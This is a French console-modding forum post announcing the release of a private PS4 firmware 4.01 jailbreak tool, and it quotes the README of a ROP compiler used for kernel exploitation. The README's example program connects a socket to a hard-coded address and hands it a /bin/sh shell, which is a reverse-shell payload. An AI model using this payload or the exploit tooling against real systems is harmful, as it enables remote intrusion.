Conditions d'utilisation et règles

Conditions et règles a lire !

Politique de confidentialité

Quelles informations nous détenons sur vous ?

Contacter le Staff

Un problème ? Une question ?

  • Bienvenue sur Societyfrenchmodding !


    Societyfrenchmodding, est une communauté francophone fondée sur le principe de partage et entraides. Vous avez des questions ? n'hésitez pas a les poser, nous somme là pour vous répondre. L'inscription est gratuite, profitez en et rejoignez-nous !

  • Mod Manager BY Societyfrenchmodding!

    Télécharger

    notre Mod Manager MR ROBOT BY JOE ,

    Compatible Tout SPRX

    et encore d'autre Mod !

  • Mod Manager BY Societyfrenchmodding!

    Télécharger

    notre Mod Manager Spécial RAP Society

    et encore d'autre Mod !

Hack Le code Ksploit Chaitin dévoilé

Membres qui ont lu cette discussion (Total: 0) Voir détails

laurent68

Fondateur
Staff
fondateur
Messages
3 347
J'aime
2 980
Points
118
Top réponses
39
Chose promise, chose due, le code qui permet l'exploit sous firmware 4.01 a été dévoilé, il s'agit d'un outil privé sous forme de code qui permet le jailbreak de la PlayStation 4.



PRO: PROgramming ROP like a PRO

This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.

Build

pip install git+

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.


If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.

cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4
Examples

toy {
{% include "gadgets.pro" %}
{% include "glibc.pro" %}
const AF_INET(2);
const SOCK_STREAM(1);
const IPPROTO_IP(0);
var fd;
socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
store_rdx_rax(&fd, undefined);
printf("socket fd = %d\n", fd);
array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
connect(fd, addr, 0x10);
{% for i in range(3): %}
dup2(fd, {{i}});
{% endfor %}
system("/bin/sh");
exit(1);
}
Usage

A BIG TODO. Just try and learn by yourself.

Quick Guide

All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.

Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.

Array can be declared with size(Int) or directly initialized with its content(String).

For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.
Bien entendu, ce code et les exemples sont réservés aux développeurs.

Tout est là :

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.



Téléchargement :

Veuillez vous Identifier ou vous Inscrire pour afficher le contenu masqué.

 
Haut Bas